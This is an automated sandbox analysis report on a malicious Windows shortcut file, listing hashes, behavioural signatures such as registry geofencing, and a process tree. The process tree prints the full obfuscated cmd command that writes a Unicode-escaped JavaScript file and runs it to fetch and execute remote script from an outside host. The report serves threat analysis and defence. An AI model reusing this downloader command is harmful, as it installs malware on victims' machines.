Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

8

Static

static

1

CFe_SAT_23...34.lnk

windows7-x64

3

CFe_SAT_23...34.lnk

windows10-2004-x64

8

Analysis

  • max time kernel
    145s
  • max time network
    152s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03/02/2024, 16:22

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    CFe_SAT_235423272324734.lnk

  • Size

    1KB

  • MD5

    cbcc37aa507139d8408fc4e9ede5aca1

  • SHA1

    31ff032fdc43f66e9176109c6d989f5f59a2db0b

  • SHA256

    12491594bf58f4404bd3cf95ac334023e344421b77643d378438fce6bbbc7850

  • SHA512

    e70bf846dddb647043054d45aeb6d7dfc1af9976ce62dc5d95a62cd93e2e207c49cc41a197d39dc612c4c4f4692ba2821a2fbb41a7103a6b30e3e24ad378c380

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\CFe_SAT_235423272324734.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4036
    • C:\Windows\System32\conhost.exe
      "C:\Windows\System32\conhost.exe" C:\Windows\system32\cmd.exe /V/D/c "S^eT RXS=C:\CS6MKI\&& mD !RXS!>nul 2>&1&&S^eT IJKP=!RXS!^CGXBTDGK.JS&&<nul set/p TTGG=var TTGG='\u0030\u006e\u0032\u002b\u0044\u0030\u006e\u0032\u002b\u0045\u0030\u006e\u0032\u002b\u0022\u002f\u002f\u0068\u0036\u006f\u0065\u0068\u0072\u002e\u0067\u006c\u006f\u0062\u0061\u006c\u006e\u0065\u0074\u0077\u006f\u0072\u006b\u002e\u006d\u0079\u002e\u0069\u0064\u002f\u003f\u0031\u002f\u0022\u0029\u003b';RXS='\u003a\u0068\u0022\u003b\u0045\u0030\u006e\u0032\u003d\u0022\u0054\u0074\u0022\u002b\u0022\u0050\u003a\u0022\u003b\u0047\u0065\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0043';CGXB='\u0076\u0061\u0072\u0020\u0043\u0030\u006e\u0032\u003d\u0022\u0073\u0022\u002b\u0022\u0063\u0072\u0022\u003b\u0044\u0030\u006e\u0032\u003d\u0022\u0069\u0070\u0074\u0022\u002b\u0022';IJKP=CGXB+RXS+TTGG;TDGK=new Function(IJKP);TDGK(); >!IJKP!|caLl !IJKP!||caLl !IJKP! "
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4540
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /V/D/c "S^eT RXS=C:\CS6MKI\&& mD !RXS!>nul 2>&1&&S^eT IJKP=!RXS!^CGXBTDGK.JS&&<nul set/p TTGG=var TTGG='\u0030\u006e\u0032\u002b\u0044\u0030\u006e\u0032\u002b\u0045\u0030\u006e\u0032\u002b\u0022\u002f\u002f\u0068\u0036\u006f\u0065\u0068\u0072\u002e\u0067\u006c\u006f\u0062\u0061\u006c\u006e\u0065\u0074\u0077\u006f\u0072\u006b\u002e\u006d\u0079\u002e\u0069\u0064\u002f\u003f\u0031\u002f\u0022\u0029\u003b';RXS='\u003a\u0068\u0022\u003b\u0045\u0030\u006e\u0032\u003d\u0022\u0054\u0074\u0022\u002b\u0022\u0050\u003a\u0022\u003b\u0047\u0065\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0043';CGXB='\u0076\u0061\u0072\u0020\u0043\u0030\u006e\u0032\u003d\u0022\u0073\u0022\u002b\u0022\u0063\u0072\u0022\u003b\u0044\u0030\u006e\u0032\u003d\u0022\u0069\u0070\u0074\u0022\u002b\u0022';IJKP=CGXB+RXS+TTGG;TDGK=new Function(IJKP);TDGK(); >!IJKP!|caLl !IJKP!||caLl !IJKP! "
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1988
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" set/p TTGG=var TTGG='\u0030\u006e\u0032\u002b\u0044\u0030\u006e\u0032\u002b\u0045\u0030\u006e\u0032\u002b\u0022\u002f\u002f\u0068\u0036\u006f\u0065\u0068\u0072\u002e\u0067\u006c\u006f\u0062\u0061\u006c\u006e\u0065\u0074\u0077\u006f\u0072\u006b\u002e\u006d\u0079\u002e\u0069\u0064\u002f\u003f\u0031\u002f\u0022\u0029\u003b';RXS='\u003a\u0068\u0022\u003b\u0045\u0030\u006e\u0032\u003d\u0022\u0054\u0074\u0022\u002b\u0022\u0050\u003a\u0022\u003b\u0047\u0065\u0074\u004f\u0062\u006a\u0065\u0063\u0074\u0028\u0043';CGXB='\u0076\u0061\u0072\u0020\u0043\u0030\u006e\u0032\u003d\u0022\u0073\u0022\u002b\u0022\u0063\u0072\u0022\u003b\u0044\u0030\u006e\u0032\u003d\u0022\u0069\u0070\u0074\u0022\u002b\u0022';IJKP=CGXB+RXS+TTGG;TDGK=new Function(IJKP);TDGK(); 0<nul 1>C:\CS6MKI\CGXBTDGK.JS"
          4⤵
            PID:1616
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /S /D /c" caLl C:\CS6MKI\CGXBTDGK.JS"
            4⤵
            • Checks computer location settings
            • Modifies registry class
            • Suspicious use of WriteProcessMemory
            PID:4312
            • C:\Windows\System32\WScript.exe
              "C:\Windows\System32\WScript.exe" "C:\CS6MKI\CGXBTDGK.JS"
              5⤵
              • Blocklisted process makes network request
              PID:1268

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\CS6MKI\CGXBTDGK.JS
      Filesize

      738B

      MD5

      3f785dedebc8f7c6fc6b03378b626143

      SHA1

      1029599fe33bae01eb197f1d9a32ec8cd17b1716

      SHA256

      69bd87bd8adaa45817861cb4136b787de08676bac75ae1b5be7f47707117a5d7

      SHA512

      526016ea4c1554531a89cd5f44fcf2f4190088cf13b2251417729c27c1b5d60a4aef78ae20b3d13b55ef11dbbee8261ba3009afd2e49f97b832f73c2c76e18f3

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\CFe_SAT_235423272324734.lnk
      Filesize

      2KB

      MD5

      1ccc0ed9b24b6248ce6662e06fb2900e

      SHA1

      108dfac2af6cc79e3e94641f798bc4d47a1f02fa

      SHA256

      e03acadc0816ba781b709ca1675b03c82abfbe0f164b84a3e5e6268b2c7106c1

      SHA512

      a5574b167a090c7e2fd9b9b4d6629b16220119ac1a32776dc2597b51c70264b99568412cc7b704d0880a3f572fd207253247b4e76dd44b20db70bbfe30060ed8

      Download Submit